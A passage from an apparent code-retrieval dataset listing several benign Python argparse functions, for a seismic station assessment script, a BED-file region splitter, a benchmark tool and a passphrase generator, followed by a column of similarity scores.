required_arg_type)\n\n return required_arg_values, passed_optional_arg", "def parse_args():\n sentinel_dict = {}\n\n def _preprocess_sysargv(argv):\n inputs = []\n for arg in argv[1:]:\n # handles case where values contain --, otherwise they will\n # be interpreted as arguments.\n if '--,' in arg or ',--' in arg or arg == '--':\n sentinel = uuid4().hex\n key = '%s' % sentinel\n sentinel_dict[key] = arg\n inputs.append(sentinel)\n else:\n inputs.append(arg)\n return inputs\n\n def _postprocess_sysargv(v):\n if v in sentinel_dict:\n return sentinel_dict.get(v)\n else:\n return v\n\n #----- read input arguments\n for i, arg in enumerate(sys.argv):\n if (arg[0] == '-') and arg[1].isdigit(): sys.argv[i] = ' ' + arg\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-u', action='store_true', dest='helpmenu',help='extended HELP MENU with examples')\n parser.add_argument('-i','--infile',action='store', dest='infile',help='name of file with SAC or mseed file(s)')\n parser.add_argument('-g','--gain',action='store', dest='sensitivity',help='Stage 0 sensitivity')\n parser.add_argument('-N','--net', action='store', dest='network',help='network')\n parser.add_argument('-S','--sta', action='store', dest='station',help='station')\n parser.add_argument('-C','--cha', action='store', dest='chantype',help='chantype')\n parser.add_argument('-s','--start', action='store', dest='startstring',help='start time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-e','--end', action='store', dest='endstring',help='end time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-d','--duration', action='store', dest='durationinhours',help='duration in hours')\n parser.add_argument('-dc','--dc','--datacenter', action='store', dest='datacenter',default='IRIS',help='FDSN data center (e.g. IRIS, SCEDC, NCEDC)')\n parser.add_argument('-p','--plot',action='store_true',dest='iplot',help='make plots of each hourly trace (NOTE: can be slow)')\n\n helpextended = parser.parse_args(_preprocess_sysargv(sys.argv)).helpmenu\n if ( helpextended is True ):\n print ('')\n print ('portable_pip_squeak: assess a station either using local data or to be downloaded')\n print ('')\n print ('Usage: portable_pip_squeak.py [options]')\n print ('')\n print ('EXAMPLES:')\n print ('portable_pip_squeak.py --infile my_SAC_files.txt')\n print ('portable_pip_squeak.py -N UW -S TKEY -C HH -s 2018-01-01T00:00:00 -d 2 -p')\n print ('portable_pip_squeak.py -N CI -S LEO -C HN -s 2020-01-01T00:00:00 -d 24 -dc SCEDC')\n print ('')\n print ('Inputs if supplying your own data:')\n print (' -i, --infile Name of text file with SAC/mseed file(s) of 3 (Z,N,E) traces.')\n print (' -g, --gain Gain or Stage 0 sensitivity')\n print (' ')\n print ('Inputs if downloading data:')\n print (' -s, --starttime Trace start time (YYYY-MM-DD,HH:MM:SS)')\n print ('')\n print (' One of these:')\n print (' -e, --endtime Trace end time (YYYY-MM-DD,HH:MM:SS)')\n print (' -d, --duration Duration in hours from starttime')\n print (' Note: if duration is neg, starttime becomes endtime')\n print (' N, S, C and a datacenter if other than IRIS')\n print (' -N, --net Network code')\n print (' -S, --sta Station code')\n print (' -C, --cha Channel type, e.g. EN or HH')\n print (' -dc, --datacenter Name of FDSN data center if not IRIS, e.g. SCEDC, NCEDC')\n print (' ')\n print ('Optional flags:')\n print ('-P, --plot Flag to make a figure for each hour. 
Note: can be slow.')\n print ('-u Print this extended help menu')\n print ('')\n\n\n return parser.parse_args(_preprocess_sysargv(sys.argv))", "def parse_args():\n parser = argparse.ArgumentParser(description=app_description,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--input-json\", dest=\"input_json_path\", required=True,\n help=input_json_help)\n\n args = parser.parse_args()\n return args", "def parse_cli():\n parser = OptionParser()\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parseArguments():\n parser = argparse.ArgumentParser(description='Tool run benchmarks and query database')\n parser.add_argument('--version', action=\"store_true\", dest=\"version\", default=False, help=\"Print version\")\n parser.add_argument(\"--query\", \"-q\", action=\"store_true\", dest=\"queryDataBase\", default=False, help=\"Query Data Base\")\n parser.add_argument(\"--performance\", \"-p\", action=\"store_true\", dest=\"queryPerformance\", default=False, help=\"Query Data Base - Performance Metrics\")\n parser.add_argument(\"--run\", \"-r\", action=\"store_true\", dest=\"runBenchmarks\", default=False, help=\"Run Benchmarks and store results in the DB\")\n args = parser.parse_args()\n return args", "def parse_cli():\n args = {}\n arg_name = None\n arg_values = None\n parameters = {}\n\n cli_args = sys.argv\n found_params = False\n skip = True\n iterator = enumerate(cli_args)\n\n for idx, arg in iterator:\n if skip:\n skip = False\n continue\n else:\n skip = True\n\n if arg == \"--params\":\n if arg_name:\n args[arg_name] = \" \".join(arg_values)\n found_params = True\n skip = False\n\n elif arg[0:2] == \"--\" and not found_params:\n if arg_name:\n args[arg_name] = \" \".join(arg_values)\n arg_name = arg[2:]\n arg_values = []\n skip = False\n\n elif arg[0:2] == \"--\" and found_params:\n raise ValueError(\"You are trying to specify an argument after the \"\n \"--params argument. 
Please change the order.\")\n\n elif arg[0] == \"-\" and arg[0:2] != \"--\" and found_params:\n parameters[cli_args[idx][1:]] = cli_args[idx+1]\n\n elif arg[0] == \"-\" and arg[0:2] != \"--\" and not found_params:\n raise ValueError(\"You either try to use arguments with only one lea\"\n \"ding minus or try to specify a hyperparameter bef\"\n \"ore the --params argument. %s\" %\n \" \".join(cli_args))\n elif arg[0:2] != \"--\" and not found_params:\n arg_values.append(arg)\n skip = False\n\n elif not found_params:\n raise ValueError(\"Illegal command line string, expected an argument\"\n \" starting with -- but found %s\" % (arg,))\n\n else:\n raise ValueError(\"Illegal command line string, expected a hyperpara\"\n \"meter starting with - but found %s\" % (arg,))\n\n return args, parameters", "def parse_commandline():\n parser = argparse.ArgumentParser(prog=\"passgen\")\n parser.add_argument(\"n\", type=int, nargs=\"?\", default=6,\n help=\"number of words in the pass phrase (default=6)\")\n parser.add_argument(\"--special\", action=\"store_true\",\n help=\"\"\"make pass phrase stronger by randomly inserting\n a special character (default=false)\"\"\")\n parser.add_argument(\"--source\", metavar=\"<file name>\",\n default=\"wordlist.txt\",\n help=\"use alternative word list to generate pass phrase\")\n parser.add_argument(\"--separator\", default=\" \",\n help=\"separator between words (default=\" \")\")\n\n return parser.parse_args()" ]
[ "0.7854356", "0.7411294", "0.738185", "0.7369688", "0.725296", "0.72444576", "0.7242427", "0.7233522", "0.7119903", "0.7105029", "0.70896465", "0.7079773", "0.7079739", "0.7069191", "0.706641", "0.7060959", "0.7060555", "0.7030648", "0.70134765", "0.69964945", "0.6994354", "0.6978943", "0.69728374", "0.69595206", "0.6958412", "0.6956785", "0.69354194", "0.69176507", "0.6915062", "0.6903181", "0.6902011", "0.6901908", "0.690117", "0.6889851", "0.6886239", "0.6880377", "0.6878343", "0.6872707", "0.6868478", "0.6868177", "0.6864077", "0.6860715", "0.68476063", "0.68298304", "0.6829585", "0.6828522", "0.68281186", "0.6816272", "0.68080324", "0.68068695", "0.6799684", "0.6794822", "0.6793404", "0.6792423", "0.67915666", "0.6789505", "0.6789317", "0.6787441", "0.67835855", "0.6782817", "0.678215", "0.67727196", "0.67700756", "0.6763764", "0.67622405", "0.6758813", "0.6755606", "0.6755259", "0.6748387", "0.6744464", "0.6737574", "0.6736242", "0.67331094", "0.67308354", "0.67261577", "0.67254627", "0.6724947", "0.67218894", "0.67218715", "0.6719563", "0.6719325", "0.6718747", "0.6718604", "0.67177814", "0.6716747", "0.6706742", "0.67053133", "0.6701474", "0.67001593", "0.6697296", "0.66972244", "0.6692583", "0.669158", "0.66914266", "0.6691102", "0.6689989", "0.66877735", "0.6686881", "0.66787666", "0.6677475", "0.6671148" ]
0.0
-1
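A row in this dump closes with its negative_scores, document_score, and document_rank, as above. As a hedged sketch (the `row` dict, its keys, and the 0.9 cutoff are illustrative assumptions, not a real loader), one way to unpack such a row into training triplets:

def iter_triplets(row):
    # Yield (query, positive, negative) triplets from one dump row.
    query = row["query"]
    positive = row["document"]
    for negative, score in zip(row["negatives"], row["negative_scores"]):
        # negative_scores are serialized as strings in this dump, so cast first.
        if float(score) < 0.9:  # hypothetical cutoff to drop near-positives
            yield query, positive, negative

# Toy row shaped like the entries in this dump:
row = {
    "query": "What are the most popular three articles of all time?",
    "document": "def getPopularArticles(): ...",
    "negatives": ["def parse_args(): ...", "def parse_cli(): ..."],
    "negative_scores": ["0.7854356", "0.7411294"],
}
for q, pos, neg in iter_triplets(row):
    print(q, "->", neg)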
What are the most popular three articles of all time?
def getPopularArticles():
    db = psycopg2.connect("dbname=news")
    c = db.cursor()
    c.execute(" select count (*) as views, title from articles " +
              "left join " +
              "log on concat('/article/', articles.slug) = log.path " +
              "group by title order by views desc limit 3")
    views = c.fetchall()
    db.close()
    return views
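A minimal usage sketch for the document above, assuming a reachable `news` database and `psycopg2` imported; the tuples unpack as (views, title) because of the column order in the SELECT:

for views, title in getPopularArticles():
    print('"{0}" - {1} views'.format(title, views))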
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path 
\n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def 
most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. 
The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def most_popular_authors():\n print '2. 
The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def top_controversial(self, n):\n return top_movies", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY 
aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_popular(self, n):\n return popular_tags", "def recommend_for_new_user(titles=False, n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_mostFrequent(self, n=5):\r\n pass", "def get_mostFrequent(self, n=5):\r\n pass", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def top_keywords(urls, count=10):\n try:\n res = Counter()\n for url in urls:\n res += Counter(get_keyword_dict(url))\n return [w[0] for w in res.most_common(count)]\n except:\n print('Error finding top keywords')", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def getMostPlausibleArticleClasses(aSoup, **kwargs):\n if 'minNbrOccurrences' in kwargs:\n regularMin = kwargs.get('minNbrOccurrences')\n # without this line, can cause TypeError for duplicate keyword argument error \n kwargs.pop('minNbrOccurrences')\n else:\n regularMin = 6\n #\n classes,nbrs = filterPossibleArticleRelatedClasses(aSoup, minNbrOccurrences=regularMin, **kwargs)\n try:\n # articles have the same classes for different tags in the hierarchy\n mostReccurentSetOfClassEff = statistics.mode(nbrs)\n except statistics.StatisticsError:\n _dNsEffs = effectif(nbrs)\n _ns = list(_dNsEffs)\n _effs = [_dNsEffs[key] for key in _ns]\n mostReccurentSetOfClassEff = _ns[_effs.index( max(_effs) )]\n articleRelatedClasses = [classes[i] for i,n in enumerate(nbrs) if n==mostReccurentSetOfClassEff]\n articleRelatedClassesOccurrences = [nbrs[i] for i,n in enumerate(nbrs) if n==mostReccurentSetOfClassEff]\n return articleRelatedClasses, articleRelatedClassesOccurrences", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def 
popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def getBestStories(self):\n source = self.getSource(\"http://news.ycombinator.com/best\")\n stories = self.getStories(source)\n return stories", "def get_popular(lookups):\n return {k: lookups.link_counts[k] for k in lookups.movie_to_idx}", "def dashboard_content_article_tag_cloud():\n tag_stats = dict()\n past_30 = offset_time_past(30, str=True)\n articles = mongo.db[app.config['ARTICLES_COLLECTION']]\n results = articles.find({'collected': {'$gt': past_30}}, {'_id': 0})\n for result in results:\n for tag in result.get('tags', list()):\n tag_stats[tag] = tag_stats.get(tag, 0) + 1\n tags_sorted = sorted(tag_stats.items(), key=operator.itemgetter(1),\n reverse=True)[:50]\n data = list()\n for item in tags_sorted:\n data.append({'name': item[0], 'weight': item[1]})\n return jsonify(data)", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def count_words(all_articles):\n total_words = 0\n for title in all_articles:\n total_words += all_articles[title]['word-count']\n print(f\"There are {total_words} words written.\")", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n 